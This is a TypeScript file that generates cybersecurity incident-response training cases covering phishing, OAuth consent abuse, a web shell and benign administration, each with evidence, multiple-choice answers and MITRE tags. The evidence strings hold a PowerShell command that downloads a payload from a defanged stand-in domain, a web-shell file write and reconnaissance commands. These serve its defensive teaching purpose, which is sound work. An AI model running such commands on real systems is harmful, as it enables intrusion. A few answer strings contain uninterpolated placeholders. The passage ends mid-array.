import type { AnswerId, Difficulty } from "./types";
import type { CaseAnswer, CaseArtifacts, CaseOutcome, EvidenceItem, IntrusionCase, InvestigationStage } from "./intrusionTypes";

type Blueprint = {
  id: string; environments: string[]; tags: string[]; outcomes: CaseOutcome[];
  build: (a: CaseArtifacts, difficulty: Difficulty) => InvestigationStage[];
};

function rng(seed: number) { let value=seed>>>0; value^=value>>>16; value=Math.imul(value,0x7feb352d); value^=value>>>15; value=Math.imul(value,0x846ca68b); value^=value>>>16; return () => ((value = Math.imul(1664525, value) + 1013904223 >>> 0) / 4294967296); }
function pick<T>(items: T[], random: () => number) { return items[Math.floor(random() * items.length)]; }
function pad(value: number) { return String(value).padStart(2, "0"); }
function time(base: string, seconds: number) { const d = new Date(base); d.setUTCSeconds(d.getUTCSeconds() + seconds); return `${pad(d.getUTCHours())}:${pad(d.getUTCMinutes())}:${pad(d.getUTCSeconds())}`; }
function defang(domain: string) { return domain.replaceAll(".", "[.]"); }
function ev(id:string,source:string,title:string,detail:string,timestamp:string):EvidenceItem { return {id,source,title,detail,timestamp}; }
function answers(correct:string, wrong:[string,string,string], explanations:[string,string,string,string], critical:number[]=[]):CaseAnswer[] {
  const ids:AnswerId[]=["A","B","C","D"]; return [correct,...wrong].map((text,index)=>({id:ids[index],text,correct:index===0,critical:critical.includes(index),explanation:explanations[index]}));
}
function shuffleAnswers(items: CaseAnswer[], random: () => number) { const copy=[...items]; for(let i=copy.length-1;i>0;i--){const j=Math.floor(random()*(i+1));[copy[i],copy[j]]=[copy[j],copy[i]];} const ids:AnswerId[]=["A","B","C","D"]; return copy.map((item,index)=>({...item,id:ids[index]})); }
function stage(id:string,phase:string,question:string,evidence:EvidenceItem[],options:CaseAnswer[],discoveries:string[],tactic?:InvestigationStage["tactic"]):InvestigationStage { return {id,phase,question,evidence,answers:options,discoveries,tactic}; }

const environments:Record<string,{prefixes:string[];servers:string[];roles:string[]}>={
  Financial:{prefixes:["ACCT-LT","FIN-WS","PAY-LT"],servers:["LEDGER-SRV","FS-ACCT","PAY-APP"],roles:["apayable","treasury","analyst"]},
  Healthcare:{prefixes:["CLIN-WS","HIM-LT","CARE-WS"],servers:["EHR-APP","FILES-MED","LAB-SRV"],roles:["records","scheduler","nurse"]},
  SaaS:{prefixes:["DEV-LT","OPS-WS","ENG-LT"],servers:["BUILD-SRV","PROD-WEB","CI-RUNNER"],roles:["developer","sre","support"]},
  Manufacturing:{prefixes:["ENG-WS","PLANT-LT","OPS-WS"],servers:["MES-SRV","FILE-OPS","ERP-APP"],roles:["planner","engineer","operator"]},
  "Professional services":{prefixes:["CONS-LT","LEGAL-WS","AUD-LT"],servers:["DMS-SRV","FILES-01","CRM-APP"],roles:["consultant","paralegal","auditor"]},
  "Hybrid enterprise":{prefixes:["CORP-LT","HQ-WS","REMOTE-LT"],servers:["FILE-SRV","APP-SRV","DC-02"],roles:["employee","manager","contractor"]},
};

function artifacts(seed:number,environment:string):CaseArtifacts { const r=rng(seed^0x51f15e); const p=environments[environment]; const n=()=>pad(10+Math.floor(r()*89)); const first=pick(["alex","jamie","morgan","taylor","sam","riley"],r); const last=pick(["chen","patel","rivera","nguyen","brooks","kim"],r); const domains=["sync-docs.example","edge-cache.test","portal-assets.invalid","updates.example"]; const names=["Quarterly_Access_Review.docm","Supplier_Terms_Update.xlsm","Benefits_Enrollment.docm","Secure_Message.html"]; const base=new Date(Date.UTC(2026,Math.floor(r()*8),1+Math.floor(r()*24),8+Math.floor(r()*8),Math.floor(r()*50),0)); return {user:`${first}.${last}`,host:`${pick(p.prefixes,r)}-${n()}`,secondaryHost:`${pick(p.prefixes,r)}-${n()}`,server:`${pick(p.servers,r)}${1+Math.floor(r()*4)}`,filename:pick(names,r),domain:pick(domains,r),ip:`198.51.100.${10+Math.floor(r()*180)}`,emailSubject:pick(["Updated supplier terms","Shared secure document","Benefits action required","Invoice discrepancy"],r),taskName:pick(["OfficeTelemetrySync","UserUpdateCheck","DocumentCacheRefresh"],r),cloudApp:pick(["Document Workflow Helper","Meeting Notes Sync","Mailbox Analytics"],r),baseTime:base.toISOString()}; }

const phishing:Blueprint={id:"phishing-powershell-task-credential-smb",environments:Object.keys(environments),tags:["Endpoint","Identity","Windows","Hybrid"],outcomes:["CASE CONTAINED","PARTIAL CONTAINMENT"],build:(a,d)=>[
  stage("mail","OBSERVE","What should you investigate first?",[ev("e1","Email security","Message delivered",`${a.emailSubject} to ${a.user}; attachment ${a.filename}`,time(a.baseTime,0)),ev("e2","EDR","Process alert",`WINWORD.EXE spawned powershell.exe on ${a.host}`,time(a.baseTime,201))],answers("Correlate the email, process tree, and network activity on the recipient host",["Detonate the attachment but postpone reviewing activity on the recipient host","Search for the email subject across other mailboxes before validating execution","Isolate the recipient host immediately without preserving the process and network context"],["This tests whether delivery led to execution without destroying evidence.","Sandboxing helps classify the file, but it does not establish what already occurred on the endpoint.","Campaign scoping matters, but the execution alert on the recipient is the most immediate lead.","Isolation may become necessary, but evidence should be captured and the observed execution validated first."],[3]),["Suspicious attachment"],{name:"INITIAL ACCESS",technique:"T1566.001 — Spearphishing Attachment",evidence:a.filename}),
  stage("execution","FORM HYPOTHESIS",d==="green"?"Which evidence best confirms code execution?":"Which event most changes your assessment from suspicious delivery to host compromise?",[ev("e3","PowerShell 4104","Script block",`iwr hxxps://${defang(a.domain)}/api/client.bin -OutFile C:\\ProgramData\\client.bin`,time(a.baseTime,205)),ev("e4","DNS", "Name resolution",`${a.host} queried ${a.domain}`,time(a.baseTime,207))],answers("The PowerShell download followed by the file write",["The attachment-open event without a child process or file change","The DNS query without its initiating process context","The email-security verdict without endpoint execution telemetry"],["The process and file events establish execution and retrieval.","Opening a document raises concern but does not independently establish payload execution.","DNS supports the chain, but without process attribution it is weaker than the download and write.","A gateway verdict classifies delivery risk but does not prove host execution."]),["PowerShell","Payload retrieval"],{name:"EXECUTION",technique:"T1059.001 — PowerShell",evidence:"WINWORD.EXE → powershell.exe"}),
  stage("persistence","CHOOSE NEXT ACTION","What telemetry should you request next to test for persistence?",[ev("e5","Sysmon","File created",`C:\\ProgramData\\client.bin written by powershell.exe`,time(a.baseTime,209)),ev("e6","Task Scheduler","Task registered",`${a.taskName} runs client.bin at user logon`,time(a.baseTime,227))],answers("Task Scheduler operational logs and the task XML",["Sysmon process and file events around client.bin without collecting the task definition","Run-key and startup-folder changes from the same time window","DNS and proxy history for the payload domain"],["The task evidence directly tests persistence and execution context.","These events help reconstruct execution but do not establish the task trigger, principal, or action.","Those are valid persistence locations, but current evidence specifically identifies Task Scheduler.","Network history supports delivery and command-and-control analysis, not the observed persistence mechanism."]),["Scheduled Task"],{name:"PERSISTENCE",technique:"T1053.005 — Scheduled Task",evidence:a.taskName}),
  stage("credential","SCOPE","Which account and asset should be scoped next?",[ev("e7","Windows Security","Credential access signal",`Suspicious handle access to LSASS from client.bin on ${a.host}`,time(a.baseTime,248)),ev("e8","Authentication","New logon",`${a.user} authenticated to ${a.server} from ${a.host}`,time(a.baseTime,281))],answers(`Scope ${a.user}, ${a.host}, and authentication to ${a.server}`, [ `Scope only ${a.host} and exclude account activity after the credential-access event`,`Scope every privileged account and production server before following the observed ${a.user} logon`,`Scope ${a.secondaryHost} because it shares the workstation naming pattern`],["The same identity and host connect credential access to a new target.","Host-only scoping misses possible credential reuse on the newly contacted server.","Enterprise-wide scoping is premature and delays the strongest evidence-backed lead.","A naming pattern is not evidence that the secondary host entered the intrusion path."]),["Credential Access",a.server],{name:"CREDENTIAL ACCESS",technique:"T1003.001 — LSASS Memory",evidence:`client.bin on ${a.host}`}),
  stage("contain","CONTAIN","What should be contained first?",[ev("e9","SMB telemetry","Remote service activity",`${a.user} created a service on ${a.server} from ${a.host}`,time(a.baseTime,296))],answers(`Isolate ${a.host}, restrict ${a.user}, and protect ${a.server} while preserving evidence`,[`Restrict ${a.user} but leave ${a.host} connected for unrestricted observation`,`Power off ${a.server} immediately without coordinating evidence capture or service impact`,`Isolate ${a.secondaryHost} first because it is another workstation`],["Targeted containment interrupts the established path.","Identity-only containment leaves the confirmed malicious host able to use other access.","The target server matters, but abrupt shutdown may be disproportionate and destroy volatile evidence.","The selected asset has not entered the evidence-backed attack path."],[1,2,3]),["SMB","Lateral Movement"],{name:"LATERAL MOVEMENT",technique:"T1021.002 — SMB/Windows Admin Shares",evidence:`${a.host} → ${a.server}`})]};

const cloud:Blueprint={id:"oauth-consent-mailbox-collection",environments:["SaaS","Professional services","Hybrid enterprise","Financial"],tags:["Cloud","Identity","Email","OAuth"],outcomes:["CASE CONTAINED","COMPROMISE CONFIRMED"],build:(a,d)=>[
  stage("consent","OBSERVE","What is the best first validation step?",[ev("c1","Entra ID","Consent grant",`${a.user} granted ${a.cloudApp} Mail.Read and offline_access`,time(a.baseTime,0)),ev("c2","Authentication","Sign-in",`Successful browser sign-in for ${a.user} from ${a.ip}`,time(a.baseTime,-44))],answers("Validate the consent, sign-in context, user intent, and application publisher",["Validate only whether MFA succeeded during the interactive sign-in","Validate only whether the application name resembles an approved business tool","Validate only the user's recollection without reviewing consent or publisher records"],["These checks test whether the grant was authorized.","MFA validates a sign-in challenge, not the requested application permissions.","A plausible display name is not reliable publisher or authorization evidence.","User context matters, but it must be correlated with objective consent and application records."]),["OAuth consent"],{name:"INITIAL ACCESS",technique:"T1528 — Steal Application Access Token",evidence:a.cloudApp}),
  stage("audit","FORM HYPOTHESIS","Which evidence would best distinguish legitimate use from account abuse?",[ev("c3","Cloud audit","Mailbox access",`${a.cloudApp} accessed 642 messages across 18 folders`,time(a.baseTime,180)),ev("c4","HR context","User status",`${a.user} is active but denies installing the application`,time(a.baseTime,240))],answers("Review application access logs, consent provenance, and message-access scope",["Review only Entra sign-in risk for the user and treat a low-risk result as dispositive","Review mailbox audit events without examining which application identity performed them","Review endpoint EDR on the user's managed device before checking the cloud application logs"],["Cloud audit evidence directly tests token use.","Sign-in risk can add context but may not detect abuse through an already consented application.","Mailbox events are useful, but attribution to the OAuth application is necessary to test the hypothesis.","Endpoint evidence may be relevant later, but the observed behavior is directly available in cloud audit telemetry."]),["Mailbox access","Token abuse"],{name:"COLLECTION",technique:"T1114.002 — Remote Email Collection",evidence:"642 messages accessed"}),
  stage("contain","CONTAIN",d==="red"?"What is the most proportionate containment given the current evidence?":"What should be contained now?",[ev("c5","Cloud audit","Persistence",`New credential added to service principal for ${a.cloudApp}`,time(a.baseTime,310))],answers("Revoke grants and tokens, disable the application, rotate affected credentials, and preserve audit logs",["Revoke the user's refresh tokens but leave the application's grant and new credential active","Disable the application but postpone rotating credentials and reviewing other consent grants","Isolate the user's laptop while leaving the cloud application and tokens active"],["This removes cloud persistence while preserving evidence.","User-token revocation alone does not remove application persistence.","Disabling the application helps, but incomplete credential and grant handling leaves recovery gaps.","The evidence is cloud-scoped, so endpoint-only containment misses the active control plane."],[1,2,3]),["Cloud persistence"],{name:"PERSISTENCE",technique:"T1098.001 — Additional Cloud Credentials",evidence:"Service-principal credential"})]};

const web:Blueprint={id:"public-app-webshell-service-account",environments:["SaaS","Manufacturing","Healthcare","Hybrid enterprise"],tags:["Web","Server","Network","Identity"],outcomes:["CASE CONTAINED","PARTIAL CONTAINMENT"],build:(a,d)=>[
  stage("web","OBSERVE","What should the analyst correlate next?",[ev("w1","WAF","Exploit pattern",`POST /api/import from ${a.ip} returned 500 then 200`,time(a.baseTime,0)),ev("w2","EDR","Web process",`w3wp.exe spawned cmd.exe on ${a.server}`,time(a.baseTime,4))],answers("Correlate the WAF request with the web-server process tree and file changes",["Correlate source-IP reputation with WAF requests but defer host telemetry","Compare the HTTP 200 response with normal application baselines without examining the child process","Review recent administrator logons to the server before aligning the four-second request and process timeline"],["The timing connects exploitation to server execution.","Network reputation and request history help, but they cannot explain the observed child process.","Baseline comparison is reasonable, but the child process and file activity are stronger compromise signals.","Administrator activity can be a competing hypothesis, but the tightly aligned WAF and EDR events should be tested first."]),["Public application"],{name:"INITIAL ACCESS",technique:"T1190 — Exploit Public-Facing Application",evidence:`${a.ip} → ${a.server}`}),
  stage("shell","REASSESS","Which evidence best confirms the web process was used for execution?",[ev("w3","File telemetry","New file",`w3wp.exe wrote C:\\inetpub\\wwwroot\\assets\\health.aspx`,time(a.baseTime,7)),ev("w4","Process telemetry","Command",`cmd.exe /c whoami /all`,time(a.baseTime,9))],answers("The web-worker child process and newly written ASPX file",["The exploit-shaped WAF request without host process attribution","The successful HTTP response without a corresponding deployment record","The cmd.exe event without confirming its parent process or timing"],["Together these events establish web-shell behavior.","The request supports an exploit hypothesis but does not alone confirm server execution.","A response code is ambiguous without host and deployment context.","The command is suspicious, but parentage and timing are needed to attribute it to the web process."]),["Web shell","Command execution"],{name:"EXECUTION",technique:"T1505.003 — Web Shell",evidence:"health.aspx"}),
  stage("scope","SCOPE",d==="red"?"What evidence best tests whether the service account enabled expansion?":"What should be scoped next?",[ev("w5","Authentication","Service account logon",`svc-web authenticated from ${a.server} to ${a.secondaryHost}`,time(a.baseTime,88))],answers(`Review svc-web privileges and activity on ${a.secondaryHost}`, [`Review svc-web activity only on ${a.server} and exclude the newly contacted host`,`Scope every service account in the environment before examining the observed svc-web logon`,`Review all activity on ${a.secondaryHost} without tracing the svc-web logon, privileges, or source`],["The new authentication creates a supported scoping lead.","Source-host review is useful but misses the evidence that the identity reached a second asset.","Broad service-account scoping delays the specific evidence-backed lead.","Target-host review alone may find noise; tracing the observed identity and source provides the causal link."]),["Service account",a.secondaryHost],{name:"LATERAL MOVEMENT",technique:"T1021 — Remote Services",evidence:`${a.server} → ${a.secondaryHost}`})]};

const benign:Blueprint={id:"benign-admin-powershell-maintenance",environments:Object.keys(environments),tags:["Endpoint","Administration","PowerShell"],outcomes:["BENIGN ACTIVITY","FALSE POSITIVE"],build:(a,d)=>[
  stage("alert","OBSERVE","What should you verify before containment?",[ev("b1","EDR","PowerShell alert",`powershell.exe changed a security setting on ${a.server}`,time(a.baseTime,0)),ev("b2","Authentication","Admin logon",`${a.user} used an approved privileged workstation`,time(a.baseTime,-35))],answers("Verify the command, change ticket, signer, account, target, and surrounding behavior",["Verify only that a change ticket exists","Verify only that the account belongs to an administrator","Verify only that the PowerShell process was launched from an approved workstation"],["Context can distinguish approved dual-use administration from abuse.","A ticket does not prove the observed commands stayed within scope.","Administrator status does not establish authorization for this action.","A trusted source device is useful context but does not validate the command, script, or target." ]),["PowerShell","Admin activity"],{name:"EXECUTION",technique:"T1059.001 — PowerShell",evidence:"Administrative PowerShell"}),
  stage("context","REASSESS",d==="green"?"What does the new evidence indicate?":"What is the best current assessment?",[ev("b3","Change management","Approved window",`CHG-${1000+(a.user.length*37)} authorizes the exact command on ${a.server}`,time(a.baseTime,-300)),ev("b4","Code signing","Signature",`Script signed by the internal automation certificate; hash matches repository`,time(a.baseTime,8))],answers("Likely legitimate administration; validate completion and document the alert",["Confirmed intrusion because PowerShell was used","Contain the unrelated workstation","Delete the detection rule"],["Multiple independent controls support authorized activity.","PowerShell is dual-use.","That host is unrelated.","The detection still has value and should be tuned with evidence."]),["Approved change","Signed script"]),
  stage("close","FINAL ASSESSMENT","How should this case be concluded?",[ev("b5","Validation","Expected result",`Change completed successfully; no unexpected child processes or network connections`,time(a.baseTime,120))],answers("Close as benign with evidence, retain telemetry, and tune only if repeatable",["Close as a false positive and suppress all future administrator PowerShell alerts","Conclude confirmed compromise based only on the original dual-use PowerShell alert","Conclude insufficient evidence despite validated provenance, scope, and expected results"],["The conclusion is evidence-backed and preserves future detection value.","The activity was real and worth detecting; global suppression would hide future abuse.","The original alert is outweighed by independent authorization and behavior evidence.","The case now has sufficient corroborated evidence for a benign conclusion."]),["Benign activity"])]};

function phishingExtensions(a:CaseArtifacts):InvestigationStage[] { return [
  stage("mail-scope","SCOPE","Which additional mail activity should be scoped next?",[ev("pe1","Email security","Campaign match",`Three messages share the sender infrastructure and attachment hash`,time(a.baseTime,35))],answers("Review recipients, delivery disposition, attachment execution, and follow-on alerts for all three messages",["Review every message received company-wide during the month","Scope only messages with the same subject and ignore matching attachment hashes","Review the original recipient only because the other messages were quarantined"],["This follows the strongest campaign indicators and tests whether any other delivery succeeded.","The time range and population are unnecessarily broad.","Subject-only matching can miss related lures using the same payload.","Quarantine status should be verified rather than assumed to eliminate all exposure."]),["Campaign scope"]),
  stage("timeline","REASSESS","What does the event sequence most strongly suggest?",[ev("pe2","Unified timeline","Correlated sequence",`${a.filename} opened → powershell.exe → DNS → client.bin → scheduled task within 26 seconds`,time(a.baseTime,228))],answers("A causally linked execution chain rather than unrelated administrative events",["A scheduled maintenance task that happened to share the same process lineage","A phishing delivery with no evidence of endpoint execution","Independent alerts that should remain separate until malware classification finishes"],["Tight timing and parent-child relationships support one causal chain.","No approved maintenance evidence explains the document parent process.","The process, DNS, and file events demonstrate execution.","Waiting for classification would ignore strong behavioral correlation."]),["Causal timeline"]),
  stage("host-scope","SCOPE","Which endpoint population should be scoped next?",[ev("pe3","EDR search","Hash prevalence",`client.bin appears on ${a.host}; no other exact-hash matches yet`,time(a.baseTime,260))],answers("Review hosts with the same document, domain, task name, or process pattern—not only the exact payload hash",["Scope only hosts with the exact client.bin hash","Review every managed endpoint with no time or behavior filter","Scope only ${a.host} because prevalence returned one exact match"],["Multiple behavioral indicators catch repacked payloads and related activity.","Exact-hash scoping can miss variants.","Unbounded enterprise scoping creates noise before evidence-led pivots are exhausted.","A single exact match does not exclude related artifacts on other hosts."]),["Behavioral scoping"]),
  stage("identity-hypothesis","FORM HYPOTHESIS","Which hypothesis best explains the successful server logon?",[ev("pe4","Identity telemetry","Logon context",`${a.user} used Kerberos from ${a.host}; no MFA event applies to this internal service`,time(a.baseTime,283))],answers("Credentials or session material from the compromised host may have been reused",["The server was necessarily exploited over the internet","MFA failure proves the user approved the access","The logon must be benign because Kerberos was used"],["The host compromise and credential-access signal make reuse the strongest testable hypothesis.","No evidence shows direct internet exploitation of the server.","Internal Kerberos does not produce the claimed MFA evidence.","Kerberos is a mechanism, not proof of legitimate intent."]),["Credential reuse"]),
  stage("request-auth","CHOOSE NEXT ACTION","What telemetry should be requested to test credential reuse?",[ev("pe5","Authentication","Available sources",`Domain-controller events and ${a.server} logon telemetry are retained for 30 days`,time(a.baseTime,286))],answers("Request 4624/4625 events, Kerberos ticket events, source workstations, and privileged group activity for the account",["Request only DNS logs for the payload domain","Request only the user's email click history","Request vulnerability scan results for ${a.server}"],["These sources test when, where, and how the identity was used.","DNS confirms infrastructure contact but not credential reuse.","Click history does not scope post-compromise authentication.","Vulnerability results do not attribute account activity."]),["Authentication telemetry"]),
  stage("risk","PRIORITIZE","Which asset presents the highest immediate investigation risk?",[ev("pe6","Asset inventory","Business context",`${a.server} stores shared operational data; ${a.secondaryHost} is a standard workstation with no matching indicators`,time(a.baseTime,290))],answers(`${a.server}, because evidence shows the compromised identity reached a higher-value shared asset`,[`${a.secondaryHost}, because all workstations should be treated equally`,`The mail gateway, because it delivered the original message`,`Every production asset equally, regardless of observed access`],["Observed access plus business criticality makes the server the priority.","The secondary host lacks an evidence link.","The gateway matters for campaign control but is not the highest-risk compromised asset.","Equal prioritization prevents evidence-based triage."]),["Asset priority"]),
  stage("contain-ready","CONTAIN","Which containment package best interrupts the established path?",[ev("pe7","Case state","Confirmed path",`${a.host} → ${a.user} → ${a.server}; scheduled-task persistence remains active`,time(a.baseTime,299))],answers(`Isolate ${a.host}, disable active persistence, restrict ${a.user}, and protect ${a.server} with coordinated evidence capture`,[`Isolate ${a.host} but leave the account and server sessions unchanged`,`Disable ${a.user} but leave the endpoint and scheduled task active`,`Take ${a.server} offline while leaving the source host and identity unrestricted`],["The package addresses endpoint, identity, persistence, and target together.","Host-only containment misses reused credentials and active sessions.","Identity-only containment leaves the malicious host and persistence mechanism active.","Target-only containment does not interrupt the source of the intrusion."] ),["Containment plan"]),
  stage("recovery-check","FINAL ASSESSMENT","What evidence is required before declaring containment effective?",[ev("pe8","Response tracking","Actions complete",`Isolation and credential restrictions applied; validation is pending`,time(a.baseTime,340))],answers("Verify persistence removal, token and session revocation, no further authentication, and clean monitoring on affected assets",["Verify only that the host no longer responds to ping","Verify only that the password reset completed","Verify only that the scheduled task file was deleted"],["Containment validation must cover each established path and persistence mechanism.","Ping status does not validate identity or persistence controls.","Password completion does not prove session revocation or host containment.","File deletion alone does not validate execution, identity, or lateral movement controls."]),["Containment validation"]),
]; }

function cloudExtensions(a:CaseArtifacts):InvestigationStage[] { return [
  stage("cloud-user","FORM HYPOTHESIS","What is the strongest current hypothesis for the consent grant?",[ev("ce1","User interview","User statement",`${a.user} recalls a document-sharing prompt but not the requested permissions`,time(a.baseTime,250))],answers("A deceptive consent flow may have obtained durable mailbox access",["The user's endpoint is certainly infected with credential-dumping malware","The application is legitimate because the user clicked Allow","The mailbox access is unrelated to the consent event"],["The statement, grant, and subsequent access support consent phishing.","No endpoint evidence establishes credential dumping.","User interaction does not validate application legitimacy.","The application identity directly links the access to the grant."]),["Consent phishing"]),
  stage("cloud-scope","SCOPE","Which identities and grants should be scoped next?",[ev("ce2","Entra ID","Tenant prevalence",`${a.cloudApp} has grants from two additional users`,time(a.baseTime,262))],answers(`Review all users who granted ${a.cloudApp}, its service principal credentials, and their mailbox activity`,["Scope every OAuth application in the tenant before following this application's grants","Review only ${a.user} because the alert began with that account","Scope all sign-ins from the documentation IP but exclude application-only access"],["This follows the implicated application across identities and persistence objects.","Tenant-wide review is broader than the current evidence-led pivot.","Known additional grants make single-user scope incomplete.","Application-only access may not appear as the user's interactive sign-in."]),["Tenant scope"]),
  stage("cloud-request","CHOOSE NEXT ACTION","What telemetry should be requested to reconstruct application activity?",[ev("ce3","Retention","Cloud sources",`Unified audit, Entra service-principal logs, and mailbox audit are available`,time(a.baseTime,270))],answers("Request consent audit, service-principal sign-ins, mailbox operations, and credential-change events",["Request endpoint process trees only","Request firewall flows for the user's home router only","Request password-spray detections but omit application sign-ins"],["These sources reconstruct grant, persistence, access, and collection.","Endpoint data cannot fully represent cloud application actions.","A home-router view cannot attribute tenant application activity.","Password-spray data tests a different access hypothesis."]),["Cloud audit trail"]),
  stage("cloud-timeline","REASSESS","What does the timeline indicate about the new application credential?",[ev("ce4","Cloud timeline","Sequence",`Consent 10:04 → mailbox access 10:07 → new service-principal credential 10:09`,time(a.baseTime,280))],answers("The credential likely extends access beyond the original user session",["The credential proves the user's laptop created malware","The credential is harmless because it followed consent","The mailbox access ended when the browser closed"],["A service-principal credential can provide durable application access.","No endpoint execution is established.","Sequence does not make an unapproved credential harmless.","Application tokens and credentials can outlive a browser session."]),["Durable access"]),
  stage("cloud-data","SCOPE","Which data exposure should be scoped next?",[ev("ce5","Mailbox audit","Access pattern",`Messages matching invoice, password reset, and customer export terms were accessed`,time(a.baseTime,292))],answers("Review accessed messages, attachments, affected mailboxes, and downstream sensitive systems referenced in them",["Scope only unread messages because read messages are no longer sensitive","Review every tenant file before identifying the accessed mailboxes","Scope only the original user's sent folder"],["This follows the observed collection pattern and potential downstream exposure.","Read state does not reduce sensitivity.","Unbounded tenant review is premature.","The evidence spans folders and multiple grant holders."]),["Data exposure"]),
  stage("cloud-risk","PRIORITIZE","Which risk should be addressed first?",[ev("ce6","Privilege review","Application access",`${a.cloudApp} retains Mail.Read and a valid added credential across three users`,time(a.baseTime,300))],answers("Ongoing application access through the added credential",["The historical interactive sign-in after its session expired","A managed endpoint with no matching alerts","An unrelated low-privilege enterprise application"],["The active credential sustains current access and collection risk.","The expired session is less immediate than durable access.","No endpoint evidence raises that asset above the active cloud persistence.","The unrelated application has no evidence link."]),["Cloud priority"]),
  stage("cloud-communicate","CHOOSE NEXT ACTION","What notification should be initiated while containment proceeds?",[ev("ce7","Data classification","Mailbox content",`Accessed messages may contain customer and credential-reset information`,time(a.baseTime,305))],answers("Notify incident, privacy, and identity owners with the known scope and explicit uncertainty",["Notify every customer that all tenant data was stolen","Delay all notification until attribution is certain","Tell only the affected user and omit application persistence"],["The stakeholders need timely, bounded facts to assess obligations and downstream risk.","Current evidence does not support a tenant-wide theft claim.","Attribution certainty is not required for internal escalation.","The issue extends beyond one user to application persistence and other grants."]),["Stakeholder escalation"]),
  stage("cloud-validate","FINAL ASSESSMENT","What evidence would demonstrate successful cloud containment?",[ev("ce8","Response tracking","Controls applied",`Application disabled and grants revoked; validation pending`,time(a.baseTime,350))],answers("Confirm credential removal, token invalidation, grant revocation, and no subsequent application or mailbox activity",["Confirm only that the user changed a password","Confirm only that the application disappeared from the user portal","Confirm only that interactive sign-ins stopped"],["Each persistence and access mechanism must be independently validated.","A password change does not necessarily revoke application credentials.","Portal visibility does not prove credential invalidation.","Application-only access may continue without interactive sign-ins."]),["Cloud containment validation"]),
]; }

function webExtensions(a:CaseArtifacts):InvestigationStage[] { return [
  stage("web-request","CHOOSE NEXT ACTION","What telemetry should be requested to validate the web-shell hypothesis?",[ev("we1","Host inventory","Sources",`IIS logs, file hashes, EDR process telemetry, and application deployment records are available`,time(a.baseTime,15))],answers("Request the ASPX file, IIS request correlation, process ancestry, and deployment history",["Request only source-IP reputation","Request only vulnerability scan results","Request only administrator password age"],["These sources distinguish malicious placement from an approved deployment and connect execution.","Reputation cannot validate host behavior.","A scan may identify exposure but not the observed file and process sequence.","Password age does not test web-shell execution."]),["Web evidence"]),
  stage("web-file","FORM HYPOTHESIS","Which explanation best fits the ASPX file?",[ev("we2","Deployment system","Change history",`No approved release wrote health.aspx; file owner is the IIS application pool`,time(a.baseTime,22))],answers("The public application process likely wrote an unauthorized web shell",["A developer manually deployed the file through the approved pipeline","Antivirus created the file as a quarantine marker","The file predates the WAF request"],["Ownership, timing, and missing deployment evidence support unauthorized placement.","The deployment system contains no matching release.","The path and process ownership do not match a quarantine marker.","The timestamp follows the request."]),["Unauthorized file"]),
  stage("web-scope-hosts","SCOPE","Which servers should be scoped next?",[ev("we3","Asset inventory","Application tier",`${a.server} shares code and svc-web with two peer web nodes`,time(a.baseTime,30))],answers("Review peer nodes for the file, process pattern, exploit requests, and svc-web activity",["Scope every server in the enterprise before checking the two peers","Review only ${a.server} because the file was first found there","Scope database servers only and exclude peer web nodes"],["Shared code and identity create evidence-backed peer risk.","Enterprise-wide scope is premature.","Shared deployment and credentials make single-host scope incomplete.","The peer web tier is the direct pivot before unrelated database assets."]),["Peer web nodes"]),
  stage("web-timeline","REASSESS","What does the four-second sequence indicate?",[ev("we4","Unified timeline","Request to execution",`POST /api/import → w3wp.exe child process → ASPX write → whoami`,time(a.baseTime,35))],answers("The request likely triggered server-side execution and web-shell placement",["The request and process are probably unrelated because HTTP and EDR use different sensors","The whoami command proves an administrator performed maintenance","The file write alone proves ransomware impact"],["Temporal and causal alignment across sensors supports exploitation.","Independent sensors strengthen rather than weaken the correlation.","Whoami is dual-use and does not establish administrator intent.","No encryption or impact evidence exists."]),["Exploit timeline"]),
  stage("web-identity","SCOPE","Which service-account activity should be scoped?",[ev("we5","Identity inventory","svc-web rights",`svc-web can access peer web nodes and ${a.secondaryHost}`,time(a.baseTime,55))],answers("Review svc-web logons, ticket use, source hosts, and accessed targets from the exploit time onward",["Scope all service accounts equally before reviewing svc-web","Review svc-web password age but not its authentication activity","Scope only failed svc-web logons and exclude successful access"],["This traces the implicated identity across reachable assets.","The current identity is a stronger lead than all service accounts.","Password age does not show how the account was used.","Successful malicious authentication is central to the case."]),["Service-account scope"]),
  stage("web-risk","PRIORITIZE","Which system should receive the next highest priority?",[ev("we6","Authentication","New target",`svc-web successfully accessed ${a.secondaryHost} after web-shell execution`,time(a.baseTime,88))],answers(`${a.secondaryHost}, because it is the first confirmed downstream target`,["An unrelated database with higher theoretical impact","Every internet-facing host regardless of observed activity",`${a.server} only, excluding the new target`],["Observed movement makes the downstream host the next priority while the source remains contained.","Impact matters, but there is no evidence link to that database.","Broad prioritization dilutes the evidence-backed lead.","Source-only focus misses expansion."]),["Downstream priority"]),
  stage("web-contain","CONTAIN","Which containment approach best addresses the current path?",[ev("we7","Case state","Established path",`${a.ip} → ${a.server} → svc-web → ${a.secondaryHost}`,time(a.baseTime,95))],answers(`Remove ${a.server} from service safely, disable the web shell and svc-web access, and isolate ${a.secondaryHost} with evidence preservation`,[`Block ${a.ip} but leave the web shell and identity active`,`Isolate ${a.server} but leave svc-web sessions and ${a.secondaryHost} unchanged`,`Disable svc-web but leave the public exploit path and web shell available`],["The coordinated action interrupts each established part of the path.","IP blocking is easily bypassed and leaves persistence active.","Source-only containment misses identity and downstream access.","Identity-only containment leaves initial access and server persistence intact."],[1,2,3]),["Coordinated containment"]),
  stage("web-validate","FINAL ASSESSMENT","What must be verified before returning the application to service?",[ev("we8","Recovery","Rebuild planned",`${a.server} will be rebuilt from a trusted image`,time(a.baseTime,180))],answers("Confirm the vulnerable path is fixed, unauthorized files are absent, credentials are rotated, peers are clean, and monitoring is active",["Confirm only that the rebuilt server answers health checks","Confirm only that the source IP is blocked","Confirm only that health.aspx was deleted from the original disk"],["Recovery must address root cause, persistence, identity, scope, and detection.","Availability does not establish security.","A single IP control does not remediate the application.","Deleting one artifact does not establish a trusted rebuild or clean peers."]),["Recovery validation"]),
]; }

function benignExtensions(a:CaseArtifacts):InvestigationStage[] { return [
  stage("benign-request","CHOOSE NEXT ACTION","What telemetry should be requested to validate the change?",[ev("be1","Change ticket","Declared scope",`Ticket covers ${a.server}, the script, operator, and maintenance window`,time(a.baseTime,-260))],answers("Request script hash and signature, process children, network connections, and before/after configuration",["Request only the ticket title","Request only the administrator's manager name","Request a full disk image before checking the approved evidence"],["These sources test whether observed behavior stayed within the authorized scope.","A title does not validate execution details.","Reporting lines do not validate activity.","A full image is disproportionate before basic validation."]),["Change validation"]),
